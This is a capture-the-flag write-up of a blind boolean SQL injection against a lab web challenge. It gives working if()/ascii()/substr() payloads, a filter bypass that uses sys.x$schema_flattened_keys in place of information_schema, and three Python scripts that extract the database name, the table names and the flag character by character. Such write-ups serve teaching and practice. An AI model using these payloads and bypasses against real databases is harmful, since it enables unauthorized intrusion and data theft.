With id=1 the page shows:

Nu1L

With id=2 it shows:

V&N

With id=0 (no such row) it shows:

Error Occured When Fetch Result.

When the WAF triggers it shows:

SQL Injection Checked.

Submitting if(0,1,2): 0 is false, so the expression evaluates to 2, the query behaves like id=2 and the page prints V&N.

Submitting if(1,1,2): 1 is true, so it evaluates to 1, the same as id=1, and the page prints Nu1L.

That is a boolean oracle: put any condition in the first argument of if() and the page answers Nu1L when it is true and V&N when it is false.

Test the length of the current database name. With 21 the page returns Nu1L, so the condition is true:

if((length(database()))=21,1,2)

The string "if(ord" is filtered as a unit; replacing ord() with ascii() is enough to get past it (for single-byte characters the two return the same value):

import requests

url = "http://2070e1dc-ce1b-4d1c-ae33-f747d0ae05e8.node3.buuoj.cn/index.php"
# if((ascii(substr(database(),i,1))=j),1,2): true -> id=1 -> "Nu1L", false -> id=2 -> "V&N"
payload1 = "if((ascii(substr(database(),"
payload2 = ",1))="
payload3 = "),1,2)"
name = ""
for i in range(1, 22):           # 21 characters, as established by the length check
    for j in range(23, 123):     # candidate character codes (printable ASCII below '{')
        payload = payload1 + str(i) + payload2 + str(j) + payload3
        s = requests.post(url, data={'id': payload}).text
        if "Nu1L" in s:          # condition true: character i has code j
            name += chr(j)
            print(name)
            break

The database name is give_grandpa_pa_pa_pa. Next, the table names. information_schema is filtered; after some searching, sys.x$schema_flattened_keys turns out to be a usable substitute: the sys schema ships with MySQL 5.7 and later, and this view has table_schema and table_name columns. It is derived from index metadata, so only tables that have at least one index show up in it, but that is enough here.

Test the length of the concatenated table names. With 39 the page returns Nu1L, so the condition is true:

if((select(length(group_concat(TABLE_NAME)))from(sys.x$schema_flattened_keys)where(table_schema=database()))=39,1,2)

Dump the table names:

import requests

url = "http://2070e1dc-ce1b-4d1c-ae33-f747d0ae05e8.node3.buuoj.cn/index.php"
# Same oracle as before; the inner expression is now group_concat(TABLE_NAME) from the sys view
payload1 = "if((ascii(substr((select(group_concat(TABLE_NAME))from(sys.x$schema_flattened_keys)where(table_schema=database())),"
payload2 = ",1))="
payload3 = "),1,2)"
name = ""
for i in range(1, 40):           # 39 characters, as established by the length check
    for j in range(23, 123):     # candidate character codes
        payload = payload1 + str(i) + payload2 + str(j) + payload3
        s = requests.post(url, data={'id': payload}).text
        if "Nu1L" in s:          # condition true: character i has code j
            name += chr(j)
            print(name)
            break

This gives two table names: f1ag_1s_h3r3_hhhhh and users233333333333333 (18 + 1 + 20 = 39 characters, matching the length check).

Properly the next step would be the column names, but with information_schema filtered I did not bother and simply guessed that the flag sits in a column named flag of f1ag_1s_h3r3_hhhhh. The length bound is adjusted, and to save requests a small hand-picked dictionary replaces the numeric range.

import requests

url = "http://2070e1dc-ce1b-4d1c-ae33-f747d0ae05e8.node3.buuoj.cn/index.php"
# Guessed column "flag" in table f1ag_1s_h3r3_hhhhh; same if(cond,1,2) oracle
payload1 = "if(ascii(substr((select(flag)from(f1ag_1s_h3r3_hhhhh)),"
payload2 = ",1))="
payload3 = ",1,2)"
name = ""
# Small dictionary of likely flag characters (note: no '_' in it)
dic = "qwertyuioplkjhgfdsazxcvbnmQAZWSXEDCRFVTGBYHNUJMIKOLP1234567890-{}"
for i in range(1, 50):           # upper bound on the flag length
    for j in dic:
        payload = payload1 + str(i) + payload2 + str(ord(j)) + payload3
        s = requests.post(url, data={'id': payload}).text
        if "Nu1L" in s:          # condition true: character i is j
            name += j
            print(name)
            break